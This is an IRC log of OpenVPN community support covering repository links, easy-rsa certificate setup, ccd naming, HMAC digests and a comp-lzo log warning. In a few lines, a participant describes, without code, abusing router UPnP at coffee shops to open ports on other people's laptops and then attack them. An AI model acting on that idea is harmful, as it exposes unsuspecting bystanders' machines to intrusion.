21:50 < baobeiiii> it's one of the better places, at least we have fibre here 21:50 < baobeiiii> but a huge pita without vpn 21:51 < baobeiiii> constant connection resets on google and a ton of websites 21:51 -!- brute11k [~brute11k@89.249.230.159] has joined #openvpn 21:51 < baobeiiii> could you pleaseeee google 'openvpn repo' then the first link click, copy paste the download link for the redhat repo 21:52 < baobeiiii> then i'll be back on my feet :) 21:52 -!- brute11k1 [~brute11k@89.249.230.159] has quit [Ping timeout: 256 seconds] 21:54 < SpeedingBus> https://community.openvpn.net/openvpn/wiki/OpenvpnSoftwareRepos 21:54 <@vpnHelper> Title: OpenvpnSoftwareRepos – OpenVPN Community (at community.openvpn.net) 21:55 < baobeiiii> yea that's the link, but blocked here 21:56 < baobeiiii> once in there, there's normally a list of OS, just need the redhat one 21:56 < SpeedingBus> i hope pastebin isn't blocked 21:56 < SpeedingBus> http://pastebin.com/bs5kFv0F 21:56 < SpeedingBus> there you go 21:57 < baobeiiii> pastebin is lol 21:58 -!- rych [~root@5.231.5.192] has joined #openvpn 21:59 < rych> http://repos.openvpn.net/repos/yum/conf/repos.openvpn.net-CentOS6-snapshots.repo 22:01 < baobeiiii> thanks! 22:01 -!- SpeedingBus [~root@5.231.5.192] has quit [Ping timeout: 248 seconds] 22:01 -!- rych is now known as SpeedingBus 22:01 < SpeedingBus> np 22:03 < baobeiiii> got it installed 22:03 < SpeedingBus> that was fast 22:04 < SpeedingBus> do you own sanjose.com? 22:04 < baobeiiii> once u add the repo just yum install openvpn 22:04 < baobeiiii> yea 22:05 < baobeiiii> damn easy-rsa isn't bundled with 2.3 22:06 < SpeedingBus> lol 22:06 < SpeedingBus> It would be a hell of a lot easier if you just use debian 22:06 < SpeedingBus> installing it is just a matter of apt-get openvpn 22:06 < SpeedingBus> with everything 22:07 < baobeiiii> debian use the new release? 
22:07 < SpeedingBus> hmm maybe not 22:07 < SpeedingBus> i think it uses 2.2 22:07 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Remote host closed the connection] 22:07 < pekster> 2.2 should be fine unless you need the IPv6 or other recent features 22:08 < baobeiiii> well i've got the server up and openvpn 2.3 installed, just need a kind soul to give me a link to download easy-rsa 22:10 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 22:10 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 22:12 < SpeedingBus> you mean there is no easy-rsa folder under openvpn? 22:13 < pekster> The Unix/Linux project split it off into a separate functional project, since they're not really related (but useful together) 22:14 < pekster> Here's the latest official project download: the master should be fine to use: https://github.com/OpenVPN/easy-rsa/archive/master.zip 22:14 < pekster> Well, latest code download 22:14 < SpeedingBus> nice 22:14 < pekster> Not the official release, but that includes some improvements anyway to the security (using sha256, and 2048 keysizes) 22:14 < baobeiiii> thanks 22:14 < baobeiiii> i always change to 2048 22:15 < baobeiiii> sha256 will add a bit of overhead 22:15 < pekster> Not really 22:15 < pekster> It's the X509 signature alg, so it's only used for the control channel stuff 22:17 < pekster> baobeiiii: Oh, that might actually need some adjustment since it won't flawlessly work until "built" due to some references in the vars file :\ 22:18 < baobeiiii> u mean if i dont use sha? 
22:18 < pekster> Oh, nevermind, I was mistaken; it'll work fine (I missed a script that makes it all work) 22:18 < pekster> Just cd into the 2.0 folder under easy-rsa and you should be set 22:19 < pekster> That zip is the upstream source, so it includes the "old" 1.0 and Windows versions too, but it's more recent and includes a fix I wrote to improve the security in line with recent standards improvements (thus making it more secure) 22:20 < baobeiiii> so i just use the 2.0 dir one 22:21 < pekster> Yea 22:21 < baobeiiii> ah that's cool that you worked on it 22:21 < SpeedingBus> pekster: how does one use the client dnat directive in openvpn 2.3? 22:22 < pekster> I'm trying to pretend that option doesn't exist... 22:22 < pekster> It's an awful hack 22:22 < SpeedingBus> how is it awful? You mean it's broken? 22:23 < SpeedingBus> doesn't work etc etc? 22:23 < pekster> No, as in it's something you shouldn't ever have to do 22:23 < baobeiiii> ah you left the fields in there 22:23 < baobeiiii> should remove them ;) 22:23 < pekster> It "works" as much as any convoluted network remap NAT hack does 22:23 < baobeiiii> country, email etc 22:23 < pekster> baobeiiii: That's on my todo list 22:23 < baobeiiii> just deleting them doesnt work? 22:23 < pekster> For now, just type the '.' character to not include them in your certs 22:24 < baobeiiii> "." for each, cool 22:24 < pekster> Just the CN is needed 22:24 < pekster> None of that email, country, state, province, etc crap 22:25 < pekster> I use a different set of scripts that better meet my needs, but the effect if you leave them out is like this: http://fpaste.org/GbdX/ 22:27 < pekster> SpeedingBus: Those "nathack" options are for transparently re-writing networks to use the same numbered networks on either side of a VPN connection, while pretending to the local side that the remote "duplicate" network is accessible on a faked equivalent network. One can do hackery like that in iptables/ipf too, but now it's a "helpful" option. 
It's still a really ugly NAT hack that you should fix by properly numbering networks 22:28 < pekster> If that got cut off, "... It's still a really ugly NAT hack that you should fix by properly numbering networks" 22:28 < baobeiiii> edited vars using "." 22:29 < baobeiiii> making the ca it says 'country name too short, needs to be 2 bytes long' 22:29 < pekster> Yea, don't do that 22:29 < pekster> The . is for interactive usage 22:30 < pekster> At least I thought you could leave it out... 22:33 < pekster> Yea, it does 22:34 < baobeiiii> works 22:34 < baobeiiii> just by typing . 22:34 < baobeiiii> thx 22:34 < baobeiiii> what did u type to view the info as in that paste? 22:35 < pekster> openssl x509 -in file.crt -noout -text 22:35 < pekster> It's just showing you the "printable" format of the cert file 22:40 < baobeiiii> what was the command to make ta.key 22:40 < baobeiiii> last part then i should be able to connect 22:42 < pekster> openvpn --genkey --secret secret.key 22:43 < pekster> or ta.key, call it w/e 22:45 < baobeiiii> cheers 22:45 < baobeiiii> if u get around to tinkering with easy-rsa again, please have it make the key files 0400 22:45 < baobeiiii> just one less step ;) 22:46 < Changos> pekster: I have same problem :s 22:49 < Changos> just now I check with tcpdump on both sites, I test with ping from some PC on server site to some PC on client site. And server site packages going to tunnel VPN. But the other end (client) with tcpdump don't see anything 22:49 < Changos> vice versa is ok 22:49 < Changos> I check my firewall, and I've all input and output traffic on tun0 is clear on client site 22:53 < Changos> I check again my route table and is all fine 22:55 < Changos> I don't know, but some page was saying that this configuration only work with static key, and not with certificates. 
This is true ?, I don't think so 23:00 -!- Devastator- [~devas@186.214.110.24] has joined #openvpn 23:01 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 245 seconds] 23:11 < pekster> Changos: Is the target of your ping the VPN client, or a PC on a LAN behind the VPN client? 23:18 < Changos> ping from any PC on server to VPN Client target successful, ping from any PC on server to Ethernet LAN or any PC on LAN on client unsuccessful 23:18 < Changos> pekster: ---^ 23:21 < pekster> Can you pastebin your server config, client config, and server ccd file for the client? 23:22 < Changos> sure 23:26 < Changos> pekster: http://pastebin.ca/2314911 23:29 < pekster> Changos: Is the client CN 'client1' and not 'client01' ? 23:31 < pekster> In other words, if you do this command on the client, you should see the text "CN=client1" in the output: openssl x509 -in client01.vdcoop.co.key -noout -text | grep Subject 23:34 < baobeiiii> hmm can't start up openvpn service 23:34 < baobeiiii> failed 23:34 < baobeiiii> done it so many times, haven't missed anything 23:35 -!- Orbi [~opera@109.129.3.224] has joined #openvpn 23:35 -!- Orbi [~opera@109.129.3.224] has left #openvpn [] 23:35 < baobeiiii> openvpn.log says cannot openvpn tun/tap dev no such device 23:36 < pekster> Missing kernel tun support most likely, or you've specified a specific named device that doesn't exist 23:37 < Changos> pekster: CN=client01/name=changeme/emailAddress= 23:37 < pekster> Changos: That's your problem then. The ccd file must *exactly* match the client CN. So, your file must be named client01, not client1 23:37 < Changos> baobeiiii: compile kernel with support to tun/tap 23:41 < Changos> pekster: seriously ?, damn, ok, I change it 23:41 < Changos> and working ! 
23:41 < Changos> -_- fucking stupid error 23:41 < Changos> pekster: thank you very much :D 23:41 < pekster> You'll also save IPs if you use the 'topology subnet', although with just 2 devices, you can continue to use net30 like you are on a /29 23:42 < LifeIsPain> pekster: well, I have it all running, figured out a fair amount, and part of it was user error, part of it was dd-wrt allowing for the user error and not complaining at any point, and some of it was oddity in dd-wrt I had to figure out a way around 23:42 < pekster> However, you can't connect another client since you're out of IPs now :) 23:42 < LifeIsPain> thanks much for the pointers ~23 hours ago and on 23:43 < pekster> LifeIsPain: Yea, embedded devices tend to abstract and hide things behind layers and layers of UI and scripts 23:43 < pekster> Great if the magic pixie dust does what you want, but not so great if you need to learn how it works with no prior development work on that project 23:43 < LifeIsPain> which is all fine and dandy if it just actually works 23:44 < LifeIsPain> pretty much, trying to figure out around the oddities they introduce 23:44 < pekster> OpenWRT has the same kind of setup, with the end-goal of "easy setup" in a web page. I trashed that whole setup and just wrote my own init shell script to do exactly what I wanted 23:45 < LifeIsPain> you get more control if you do that, yep 23:46 < baobeiiii> k sent my provider a ticket 23:46 < baobeiiii> it's virtualised so can't load modules myself 23:46 < LifeIsPain> only issue I ran into afterwards is I went to a heavily firewalled location to try and connect, first it didn't think I was in the right subnet, then once I was, it was using the site's DNS which was not accessible 23:47 < baobeiiii> pekster, noticed in my log that it's using SHA1, wasn't that easy-rsa supposed to use SHA2 by default? 
23:47 < LifeIsPain> but any who, thanks much, I'll stick around for a bit, possibly field some answers, shouldn't screw anything up too much while doing so ;) 23:47 < Changos> pekster: yeah, I know, I configure the subnet purposely ;) 23:51 < Changos> Is incredible that I try fixed the problem for approx. 40 hours and finally were the file name. Any place on Internet when I reading see anything about it -_- ! 23:55 < pekster> baobeiiii: SHA1 for what, the X509 cert? By default openvpn still uses SHA1 as the HMAC unless you change it with the --alg directive 23:55 < pekster> The X509 signature method is separate from the HMAC on the data channel 23:56 < baobeiiii> was looking at hmac 23:56 < pekster> Yea, that defaults to SHA1 still unless you override it 23:56 < baobeiiii> alg SHA2 in server right 23:56 < baobeiiii> auth rather 23:56 < pekster> Yup, that's it 23:56 < pekster> SHA256 23:57 < pekster> See: openvpn --show-digests 23:57 < pekster> You can use SHA512, but the method doesn't really offer any better protection, and takes twice as much room in each packet (so I think it's a waste) 23:58 < baobeiiii> as i know sha1 is a bit weak 23:58 < baobeiiii> I'll just use sha256 23:58 -!- vraa__ [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 23:59 < pekster> The chances it'll make a difference are really low, but there's no reason not to migrate to sha2 unless it's actually not supported on one of your devices (and I'd be very surprised to see that on any modern system made in the last decade or so) --- Day changed Mon Feb 18 2013 00:01 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds] 00:16 -!- brute11k1 [~brute11k@89.249.230.159] has joined #openvpn 00:17 < matsh> pekster: Still here? 
00:17 -!- brute11k [~brute11k@89.249.230.159] has quit [Ping timeout: 245 seconds] 00:28 < pekster> matsh: Looking back at your pastebin link, your server is configured to require a certificate with the "server" attribute in the ns-cert-type field. You probably don't want this 00:29 -!- brute11k [~brute11k@89.249.230.159] has joined #openvpn 00:29 < pekster> Remove that, or use ns-cert-type client instead 00:29 < pekster> ie: the server checks that it gets a *client* cert, and the client checks that it gets a *server* cert 00:30 < SpeedingBus> pekster, how do i set dmz to my internal lan? 00:30 -!- brute11k1 [~brute11k@89.249.230.159] has quit [Ping timeout: 248 seconds] 00:36 < pekster> huh? OpenVPN has no concept of "DMZ" or "LAN" 00:37 < baobeiiii> networking channel 00:37 -!- brute11k [~brute11k@89.249.230.159] has quit [Ping timeout: 248 seconds] 00:38 < EugeneKay> The concept of a "LAN DMZ" is the most annoying thing to develop in home networking parlance since 192.168.1.x 00:38 < SpeedingBus> yeah, i was asking if i am using this on a linux system, what sort of settings/configuration do i need to set in iptables to have my internal ips, eg 10.8.x.x to be dmz by default 00:39 < pekster> Describe what you want; don't use a buzzword like "DMZ" since that means a completely different thing to me than I'm sure you mean 00:40 < SpeedingBus> ok, eg i have a vps which i have openvpn setup 00:40 < EugeneKay> When you say "DMZ" I imagine the space between the north and south korean armies 00:40 < SpeedingBus> EugeneKay: lol no 00:40 < SpeedingBus> lulz 00:40 < SpeedingBus> okay i have openvpn setup on my vps 00:41 < SpeedingBus> and i want to host a shoutcast from my pc(instead of the vps) 00:42 < SpeedingBus> now i was told that i need to open/forward certain ports for it to work 00:42 < SpeedingBus> so i did and that worked great 00:42 < SpeedingBus> but i was wondering if it is possible to have dmz(regardless of what port i want to use, instead of specifying a 
specific port in iptables) 00:43 < SpeedingBus> i can do it on openvpn-as 00:43 < SpeedingBus> but i was wondering if it can be done on openvpn instead 00:43 < SpeedingBus> *too 00:44 < EugeneKay> I'm assuming that by "DMZ" you mean "forward traffic for arbitrary ports to a client" 00:44 < EugeneKay> (please, stop using that word) 00:44 < SpeedingBus> yeah 00:45 < SpeedingBus> if i need to open a specific port, i need to set it in iptables 00:45 < EugeneKay> UPnP is one of several ways this can be done 00:45 < SpeedingBus> urgh..how do i set upnp? 00:45 < SpeedingBus> is that iptables? 00:45 < EugeneKay> Dark magic and unicorn sacrifice 00:45 < SpeedingBus> fuck i'll do it. 00:46 * SpeedingBus sacrifices a unicorn 00:46 < SpeedingBus> there 00:46 < SpeedingBus> teach me 00:46 < EugeneKay> I've never done it :-p 00:46 < EugeneKay> Try googling for 'linux upnp' 00:46 < SpeedingBus> dammit Eugene. I want my unicorn back 00:46 < pekster> uPnP is a pain, but it's great fun to abuse on routers that leave it on at wifi cafes to punch a quick port for myself 00:47 < pekster> You're far better off blindly forwarding everything through iptables to your "special" client, or doing it dynamically when it connects by way of a client-connect script 00:47 < pekster> Optionally, give it a static IP and blindly DNAT to that static IP (that should be outside of your pool range) 00:49 < SpeedingBus> I've done it by assigning static ip but i want all ports to be "opened", eg: a "dmz" 00:49 < SpeedingBus> how do i set that? 
00:50 < EugeneKay> !iptables 00:50 <@vpnHelper> "iptables" is (#1) to test if iptables is your problem, disable all rules or put the defaults to accept: iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -F; iptables -Z or (#2) please see http://openvpn.net/man#lbBD for more info or (#3) you can see http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall for pf or iptables or (#4) These is just 00:50 <@vpnHelper> the basics to get OpenVPN working. Proper firewall design is beyond the scope of this channel. You can try #iptables 00:50 < EugeneKay> See #4 ;-) 00:52 < pekster> That needs to be updated to #netfilter. Last I checked, the bot still thinks I'm scum 00:52 < pekster> !forget iptables 4 00:52 <@vpnHelper> Error: You don't have the factoids.forget capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 00:53 -!- mode/#openvpn [+o pekster] by ChanServ 00:53 <@pekster> !forget iptables 4 00:53 <@vpnHelper> Error: You don't have the factoids.forget capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 00:53 -!- mode/#openvpn [-o pekster] by ChanServ 01:07 -!- baobeiiii [~baobeiiii@180.155.14.35] has quit [Quit: Leaving] 01:14 < SpeedingBus> You should go back to #openvpn and tell them your server is pushing a 0/0 route and you don't want it to 01:14 < SpeedingBus> anyone know how do i remove 0/0? 01:20 -!- SpeedingBus is now known as BusIsSpeeding 01:26 < matsh> I don't know if there is such an equivalent for Linux, but in FreeBSD I use miniupnpd on routers. 
01:27 < pekster> I've got that in my Linux distro 01:27 < pekster> upnp is really overkill here 01:27 < matsh> I didn't really read the whole conversation, just noticed some talk about upnp :) 01:30 < pekster> I had fun playing with some tools on backtrack to (ab)use some routers. I even was able to punch holes in the NAT/forwarding on a router that's used on my LAN as an AP-only. I found i could open a port for a *different* LAN IP besides my own, heh 01:31 < pekster> upnp tends to be really badly implemented and full of attack vectors :( 01:33 < matsh> Heh, that's not good 01:34 < matsh> How? By code injection? 01:34 -!- BusIsSpeeding is now known as jaws 01:34 < pekster> No. Simply by asking it to open the port ;) 01:34 < pekster> Some run-of-the-mill home router, and it specifically takes the target LAN IP in the command 01:35 < matsh> So instead of determining IP by itself, it asks for an IP to forward the port to? 01:35 < pekster> Yup 01:37 < matsh> Werd. 01:37 < pekster> I'd be trivial to write a script to open, say, tcp/135 and similar to an entire coffee shop, for instance 01:37 < pekster> Then leave and happily attack all the unprotected laptops remotely 01:37 < pekster> It'd* 01:39 < matsh> Too easy 02:05 -!- rrva [unknown@y.mima.x.se] has quit [Quit: Lost terminal] 02:15 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds] 02:29 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 02:46 -!- jaws [~root@5.231.5.192] has quit [] 02:53 -!- peter_lee [~chatzilla@adsl-69-209-207-187.dsl.chcgil.sbcglobal.net] has joined #openvpn 02:53 < peter_lee> Hey is VPN platform independent or dependent? 
02:54 -!- Changos [~Changos@unaffiliated/changos] has quit [Ping timeout: 244 seconds] 02:54 < pekster> OpenVPN is platform independent in the sense that is has been ported to a wide variety of systems including Linux/Unix, Mac, Windows, iOS, Android, and probably others 02:55 < pekster> Well, "ported" is less the term as most of the code is platform independent, but portions are the official source are written to handle each platform's quirks 02:55 < peter_lee> So for example, let's say I have a dual boot laptop with 2 operating systems: Linux & Windows. If I install VPN on Linux will it work on Windows automatically? 02:56 < pekster> The config is portable. The binaries are of course not 02:56 < peter_lee> So I'd have to manually install it on Windows? 02:56 < pekster> Yes. Windows cannot read ELF binaries 02:56 < peter_lee> oh interesting, thanks 02:57 -!- peter_lee [~chatzilla@adsl-69-209-207-187.dsl.chcgil.sbcglobal.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 15.0.1/20120905151427]] 03:02 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 03:20 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:22 -!- zz_AsadH is now known as AsadH 03:34 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Read error: Connection reset by peer] 03:35 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 03:35 -!- mode/#openvpn [+o vpnHelper] by ChanServ 03:37 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:46 -!- baobeiiii [~baobeiiii@180.155.14.35] has joined #openvpn 03:47 < baobeiiii> vpn finally up again! 
:) 03:47 < baobeiiii> thanks for help everyone 03:54 < pekster> You might want to save your configs this time 03:55 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 252 seconds] 03:56 < baobeiiii> pekster, certainly will 03:57 < baobeiiii> even saved all the direct download links 03:57 < pekster> You can probably also use "links" or similar as a console-based web browser on a console-only server 03:57 < pekster> ie: browse the web from the VPS outside the censorship 03:58 < baobeiiii> only unusual item in my logs is 03:58 < baobeiiii> Mon Feb 18 04:54:46 2013 IP packet with unknown IP version=15 seen 03:58 < baobeiiii> repeated often, other than that working fantastically 03:58 < pekster> Using tap? 03:58 < baobeiiii> tun 03:59 < pekster> Interesting. THat's on the server logs? 03:59 < baobeiiii> yea 04:00 < baobeiiii> now i can use pastebin again too :) http://pastebin.com/jLDqLqPa 04:08 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 04:08 < pekster> Ah, okay. Now that I dig further I see how that could end up as an error in tun mode too 04:09 < pekster> It's a little strange, because it means the endpoint peer sent something marked with an IP version "15" when only 4 and 6 (for IPv4 and IPv6) are supported 04:09 < pekster> But, it doesn't hurt anything; it's just a warning that it's dropping the packet 04:20 < baobeiiii> as long as it's not a security risk etc then i can live with it 04:22 < pekster> No security problem since it passed the authentication checks. 
An attacker would have to posess the client's private key (or somehow magically continue to get every static key that's geneated hourly) in order to forge that 04:22 < pekster> Failed packets get flagged to with a message like 'decryption failed' or similar 04:25 -!- dazo [~dazo@openvpn/community/developer/dazo] has joined #openvpn 04:25 -!- mode/#openvpn [+o dazo] by ChanServ 04:28 < pekster> The other thing I'm noting is that message occurs nearly a minute before the client actually connected 04:32 < baobeiiii> ah 04:33 < baobeiiii> i'm sure very few have ever seen decryption failed lol 04:33 < baobeiiii> we're all super careful but in reality it doesnt happen 04:33 < baobeiiii> that log shows two different clients connecting (me and bro) 04:34 < pekster> Right, but line 23-24 occurs before any client is connected 04:35 < pekster> It's possible that's geneated from a locally-created packet, ie: something the server itself is sending (maybe some self-test network daemon thing) 04:35 < pekster> No idea why it gets "IP version=15" though 04:36 < baobeiiii> maybe one day there will be ip15 lol then it wont be an error 04:36 < pekster> It will be if the code doesn't support it 04:37 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has joined #openvpn 04:37 < pekster> http://fpaste.org/juht/ (from mroute.c) 04:38 < pekster> It's just looking at a hard-coded value in the beginning of the raw packet 04:42 < baobeiiii> pretty quiet in here today 04:42 < pekster> Mon Feb 18 04:42:41 CST 2013 04:43 < pekster> I'm one of these weird people that look at source code at 4AM 04:45 < pekster> The only useful reference I see online is an lzo missmatch between hosts that might cause that 04:45 < pekster> ie: the 'comp-lzo' value in the configs 04:47 -!- HyperGlide [~HyperGlid@110.185.147.126] has joined #openvpn 04:48 -!- HyperGlide [~HyperGlid@110.185.147.126] has quit [Remote host closed the connection] 04:49 < baobeiiii> i've never looked at the source code, looks like c? 
04:50 < pekster> Almost all of OpenVPN is in C
04:51 < baobeiiii> or c++
04:51 <@dazo> C
04:51 < pekster> I started by simply running part of that error message through group, which brought me to that function in mroute.c. I then grepped again for things that called that function to learn how packets get sent there
04:51 < pekster> through grep*
04:52 < pekster> My conclusion is that beyond the web-searchable instance where mis-matched lzo settings caused that error, it "shouldn't" happen. Obviously something is causing it, but without further debugging it's hard to say what
04:53 < pekster> Higher debug levels spit developer-level debug info to the log, but unless you were actually going to try and solve the underlying issue, it's not worth it
04:53 <@dazo> when --comp-lzo is 'adaptive' or 'yes' ... the wire-protocol slightly changes, telling the remote side if this has been compressed or not ... if you have --comp-lzo 'no' (or undefined) on one side and --comp-lzo 'yes' or 'adaptive' on the other side, it will fail
04:54 < pekster> Right. I found this reference on the 'IP version=15' error: http://forum.pfsense.org/index.php/topic,47156.msg247980.html#msg247980
04:54 <@vpnHelper> Title: INFO: OpenVPN between TP-LINK TL-WR1043ND (Client) and pfSense 2.0.1 (Server) (at forum.pfsense.org)
04:55 < pekster> Granted that appears to be running much older versions
04:55 <@dazo> yupp ... that's because the wire-protocol is different due to --comp-lzo being used on one side
04:55 < pekster> Yea, and I looked up the OPENVPN_IPH_GET_VER() inline function #define, so it's just treating the bits as the version when it could be compressed "junk"
04:56 <@dazo> correct
04:56 < pekster> Some other IRC log reference had the same issue, but claimed to have ruled out comp-lzo issues. I didn't see a resolution, so no clue how that turned out
04:57 < pekster> baobeiiii: Did you verify your use (or lack) of the 'comp-lzo' directive matches on both your client & server?
04:57 <@dazo> I think they face-palmed when they realised it was comp-lzo issues ... and were too ashamed to admit it publicly ;-)
04:57 <@dazo> also remember .... comp-lzo may be pushed
04:57 < pekster> Well, screw saving face, people like me search this crap weeks/years later! :P
04:57 <@dazo> yeah :)
04:58 <@dazo> (but pushed comp-lzo requires some kind of "comp-lzo" preparations on both sides, iirc)
04:58 < pekster> I do like having code available. I was on Windows yesterday, and couldn't get an accurate modern list of exit codes from defrag.exe. I would just open the source, except... :x
04:58 <@dazo> heh :)
04:58 < pekster> Some obscure issue with openvpn? No problem, just dive right in a 4 terminals full of code later, the reason is revealed
05:00 < baobeiiii> i've got comp-lzo specified on both sides, maybe just a harmless bug
05:00 < baobeiiii> impressive u can dig up that much on it though
05:01 < pekster> Is it the *same* on both sides? And be mindful that a 'push' from the server may over-ride the client if the 'client' or 'pull' line occurs after
05:02 < baobeiiii> I'll just double check
05:02 < pekster> Personally, I like pushing my comp-lzo setting from the server to insure I have control over the setting without needing to update client configs; it's also possible to use different comp-lzo settings on a per-client basis through ccd files or --client-connect scripts, but that's somewhat advanced
05:04 < baobeiiii> http://pastebin.com/ZsdP0enZ
05:04 < baobeiiii> can't see anything amiss
05:04 < baobeiiii> both server and client running 2.3
05:05 < baobeiiii> that ip 15 thing is spamming my logs though lol
05:06 < pekster> Yea, looks fine. My conclusion above still stands that you "shouldn't" be seeing that error
05:06 < baobeiiii> like 50% of the log is just that error
05:06 < baobeiiii> i noticed it happens every 60 seconds
05:06 < pekster> Yup, I saw that too
05:06 < baobeiiii> down to the second almost
05:07 < baobeiiii> maybe verb 1 or 2 will hide it
05:07 < pekster> I also noted above it happened initially before the client even connected, so it's possible it's some server-side network monitoring crap generating something, but that doesn't explain to me how openvpn gets a bogus value out of that packet buffer header
05:09 < baobeiiii> another guy exactly same
05:09 < baobeiiii> http://nerdanswer.com/answer.php?q=7880
05:09 <@vpnHelper> Title: OpenVPN Logs "IP Packet with unknown IP version=15" (at nerdanswer.com)
05:10 < pekster> The solution on the ubuntu site is worthless
05:16 -!- Devastator- [~devas@186.214.110.24] has quit [Changing host]
05:16 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn
05:17 -!- Devastator- [~devas@unaffiliated/devastator] has quit []
05:18 -!- b1rkh0ff [~b1rkh0ff@178.77.7.9] has joined #openvpn
05:19 < pekster> I'm not sure exactly, but you could try disconnecting both clients, start the server up with 'verb 6' and let it run for a few minutes to see if you get that same error as before with no clients on
05:19 < pekster> verb 6 might print packet-level details about the actual tun write, but I'm not sure if verb 6 actually dumps everything that would be interesting about the event. verb 7 dumps things like keys too, so that's a potential security problem
05:22 < pekster> mattock: Sorry I missed your pre-release notice on build I004; looks good as far as the tap batch scripts go, so thanks for re-rolling that
06:00 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has quit [Ping timeout: 245 seconds]
06:03 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has joined #openvpn
06:34 -!- eres [~rs@onyon.net] has joined #openvpn
06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 264 seconds]
06:49 <@dazo> !search wrt
06:49 <@vpnHelper> There were no matching configuration variables.
06:49 <@dazo> !factoids search wrt
06:49 <@vpnHelper> No keys matched that query.
06:51 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
06:51 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
07:03 -!- master_of_master [~master_of@p57B53E8C.dip.t-dialin.net] has quit [Ping timeout: 255 seconds]
07:05 -!- master_of_master [~master_of@p57B53193.dip.t-dialin.net] has joined #openvpn
07:13 <@plaisthos> !inline
07:13 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs
07:21 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds]
07:38 < baobeiiii> tried with verb 6 and no clients
07:38 < baobeiiii> same messages, no extra info
07:38 < baobeiiii> just going to ignore it
07:38 < baobeiiii> maybe turn off having a log file as it'll get big over time
07:40 < pekster> You can use syslog too instead of a file and just drop those lines
08:00 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::] has joined #openvpn
08:19 -!- vraa__ [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 245 seconds]
08:30 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
08:55 -!- brute11k [~brute11k@89.249.230.159] has joined #openvpn
09:11 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer]
09:12 <@ecrist> !verify
09:12 <@ecrist> !factoids search verify
09:12 <@vpnHelper> "certverify" is (#1) verify your certs are signed correctly by running `openssl verify -CAfile ` for client.crt and server.crt or (#2) also make sure you use the same ca.crt on both sides by checking their md5
09:12 <@ecrist> !factoids
09:12 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php
09:56 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has quit [Remote host closed the connection]
09:59 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has joined #openvpn
10:07 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
10:28 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Read error: Operation timed out]
10:29 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Read error: Operation timed out]
10:29 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
10:29 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
10:34 -!- axelm7 [~axelm7@186.135.15.41] has joined #openvpn
10:36 < axelm7> hi guys, I am using openvpn on DD-WRT in six countries in the Caribbean. The VPN server is in the US. My customer (the user) is a Forbes 100 company from the US.
10:36 < axelm7> So now they have me filling out security compliance forms for a possible audit and one of the questions is regarding software export controls.
10:42 <@ecrist> so what do you want to know?
10:42 < pekster> Few (if any) people here care about credentials, company size, your company's budget, or your job title. Further, you're unlikely to get legal advice from someone in a volunteer-run open-source IRC channel. That said, OpenVPN is released under the GNU GPL version 2 with all the benefits under US crypto export law that entails.
10:42 * pekster needs to learn to type more one-liners like that ;)
10:42 < EugeneKay> axelm7 - openvpn uses the openssl library for all its crypto. You can use the stuff that applies to that.
10:43 < EugeneKay> And no, we don't care about your company at all, unless you're willing to pay us to fix your issues
10:45 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 248 seconds]
10:45 <@plaisthos> EugeneKay: why so harsh?
10:46 < axelm7> plaisthos, I found pekster to be harsh, not EugeneKay.
10:46 < EugeneKay> You're confusing apathy with anger
10:47 <@plaisthos> EugeneKay: point taken, sounded different in my head
